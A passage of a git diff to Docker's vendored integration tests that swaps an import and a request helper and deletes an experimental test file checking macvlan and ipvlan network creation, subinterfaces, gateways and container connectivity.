a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go @@ -5,7 +5,8 @@ package main import ( "fmt" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -21,7 +22,7 @@ func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c "NetworkMode": netName, }, } - _, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config) + _, _, err := request.Post(formatV123StartAPIURL("/containers/"+conName+"/start"), request.JSONBody(config)) c.Assert(err, checker.IsNil) c.Assert(waitRun(conName), checker.IsNil) networks := inspectField(c, conName, "NetworkSettings.Networks") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go deleted file mode 100644 index 85dec31948..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go +++ /dev/null @@ -1,594 +0,0 @@ -// +build !windows - -package main - -import ( - "os/exec" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/parsers/kernel" - "github.com/go-check/check" -) - -var ( - MacvlanKernelSupport = testRequirement{ - func() bool { - const macvlanKernelVer = 3 // minimum macvlan kernel support - const macvlanMajorVer = 9 // minimum macvlan major kernel support - kv, err := kernel.GetKernelVersion() - if err != nil { - return false - } - // ensure Kernel version is >= v3.9 for macvlan support - if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) { - return false - } - return true - }, - "kernel version failed to meet the minimum macvlan kernel requirement of 3.9", - } - IpvlanKernelSupport = testRequirement{ - func() bool { - const ipvlanKernelVer = 4 // minimum ipvlan kernel support - const ipvlanMajorVer = 2 // minimum ipvlan major kernel support - kv, err := kernel.GetKernelVersion() - if err != nil { - return false - } - // ensure Kernel version is >= v4.2 for ipvlan support - if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) { - return false - } - return true - }, - "kernel version failed to meet the minimum ipvlan kernel requirement of 4.0.0", - } -) - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) { - // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist") - assertNwIsAvailable(c, "dm-persist") - // Restart docker daemon to test the config has persisted to disk - s.d.Restart() - // verify network is recreated from persistence - assertNwIsAvailable(c, "dm-persist") - // cleanup the master interface that also collects the slave dev - deleteInterface(c, "dm-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) { - // verify the driver automatically provisions the 802.1q link (di-dummy0.70) - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'di' notation represent 'docker ipvlan' - master := "di-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist") - assertNwIsAvailable(c, "di-persist") - // Restart docker daemon to test the config has persisted to disk - s.d.Restart() - // verify network is recreated from persistence - assertNwIsAvailable(c, "di-persist") - // cleanup the master interface that also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) { - // verify the driver automatically provisions the 802.1q link (dm-dummy0.50) - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface") - assertNwIsAvailable(c, "dm-subinterface") - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "dm-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) { - // verify the driver automatically provisions the 802.1q link (di-dummy0.50) - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker ipvlan' - master := "di-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface") - assertNwIsAvailable(c, "di-subinterface") - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) { - // verify the same parent interface cannot be used if already in use by an existing network - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, master, "dm-dummy0.40", "40") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface") - assertNwIsAvailable(c, "dm-subinterface") - // attempt to create another network using the same parent iface that should fail - out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap") - // verify that the overlap returns an error - c.Assert(err, check.NotNil) - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "dm-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) { - // verify the same parent interface cannot be used if already in use by an existing network - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker ipvlan' - master := "di-dummy0" - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, master, "di-dummy0.30", "30") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface") - assertNwIsAvailable(c, "di-subinterface") - // attempt to create another network using the same parent iface that should fail - out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap") - // verify that the overlap returns an error - c.Assert(err, check.NotNil) - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) { - // create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet - testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254", - "--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge") - // Ensure the network was created - assertNwIsAvailable(c, "dualstackbridge") - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64 - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackbridge - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackbridge - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues") - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackbridge - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackbridge - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure the proper default GW was assigned - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1") - // Inspect the v6 gateway to ensure the proper default GW was assigned - ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1") - - // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned - ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254") - // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned - ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) { - // create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254", - "--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2") - // Ensure the network was created - assertNwIsAvailable(c, "dualstackl2") - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl2 - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl2 - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl2 - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl2 - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure the proper default GW was assigned - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1") - // Inspect the v6 gateway to ensure the proper default GW was assigned - ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1") - - // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned - ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254") - // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned - ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) { - // create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254", - "--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3") - // Ensure the network was created - assertNwIsAvailable(c, "dualstackl3") - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // Verify connectivity across disparate subnets which is unique to L3 mode only - _, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - _, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "") - // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled - ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) { - // Ensure the default gateways, next-hops and default dev devices are properly set - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24", - "--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge") - assertNwIsAvailable(c, "dualstackbridge") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top") - // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet - out, _, err := dockerCmdWithError("exec", "first", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0") - // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop - out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0") - - // Verify ipvlan l2 mode sets the proper default gateway routes via netlink - // for either an explicitly set route by the user or inferred via default IPAM - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254", - "--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2") - assertNwIsAvailable(c, "dualstackl2") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "busybox", "top") - // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet - out, _, err = dockerCmdWithError("exec", "second", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0") - // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop - out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0") - - // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254", - "--subnet=2001:db8:abcd::/64", "--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3") - assertNwIsAvailable(c, "dualstackl3") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top") - // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops - out, _, err = dockerCmdWithError("exec", "third", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default dev eth0") - // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops - out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default dev eth0") -} - -func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) { - // macvlan bridge mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent") - assertNwIsAvailable(c, "dm-nil-parent") - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) { - // macvlan bridge mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal") - assertNwIsAvailable(c, "dm-internal") - nr := getNetworkResource(c, "dm-internal") - c.Assert(nr.Internal, checker.True) - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) { - // ipvlan l2 mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent") - assertNwIsAvailable(c, "di-nil-parent") - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) { - // ipvlan l2 mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal") - assertNwIsAvailable(c, "di-internal") - nr := getNetworkResource(c, "di-internal") - c.Assert(nr.Internal, checker.True) - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) { - // ipvlan l3 mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", - "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3") - assertNwIsAvailable(c, "di-nil-parent-l3") - - // start two containers on separate subnets - dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) { - // ipvlan l3 mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", - "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3") - assertNwIsAvailable(c, "di-internal-l3") - nr := getNetworkResource(c, "di-internal-l3") - c.Assert(nr.Internal, checker.True) - - // start two containers on separate subnets - dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) { - // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - netName := "dm-parent-exists" - out, err := createMasterDummy(c, "dm-dummy0") - //out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName) - assertNwIsAvailable(c, netName) - // delete the network while preserving the parent link - dockerCmd(c, "network", "rm", netName) - assertNwNotAvailable(c, netName) - // verify the network delete did not delete the predefined link - out, err = linkExists(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) - deleteInterface(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) { - // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - netName := "dm-subinterface" - out, err := createMasterDummy(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName) - assertNwIsAvailable(c, netName) - - // start containers on 802.1q tagged '-o parent' sub-interface - dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - // verify containers can communicate - _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, 